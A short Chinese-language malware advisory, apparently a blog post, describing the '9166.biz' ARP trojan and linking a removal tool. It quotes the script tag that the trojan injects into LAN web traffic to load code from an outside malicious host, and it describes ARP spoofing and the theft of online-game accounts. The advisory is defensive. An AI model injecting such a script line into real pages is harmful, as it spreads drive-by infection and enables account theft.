360安全卫士称为 9166.biz_ARP 木马。

9166.biz ---ARP木马病毒的恶意行为:

1.通过网页漏洞传播:该病毒通过植入网站上的一句JS脚本,导致有XML等漏洞的机器中招,成为此ARP病毒的传播源

2.ARP攻击篡改局域网数据包,一台电脑中招,局域网内的所有用户均遭殃:该病毒在整个局域网用户上网的网页中增加"<scrīpt src=http://9166.biz/w.js>;</scrīpt>"等内容,从而使局域网内有XML漏洞的电脑同时感染此病毒。

3.查杀困难,整个网络不时掉线:由于遭受攻击的局域网一般都是多台电脑感染,同时发起ARP攻击,因此整个局域网很不稳定,时常掉线甚至瘫痪。而且由于机器之间互相感染,因此彻底查杀及恢复非常困难。

4.后台下载多个热门游戏木马:该木马会自动到网上下载梦幻、征途、江湖、魔域、武林外传、奇迹世界、天龙八部、传奇世界、完美国际、风云、魔兽、江湖、QQ幻想等十多款网络游戏木马,偷窃用户游戏帐户。

9166.biz是该类ARP病毒的一个变种,其他变种的ARP病毒也可以查杀。

专杀工具下载地址:http://dl.360safe.com/kill_arp.exe

标签: 病毒

评论已关闭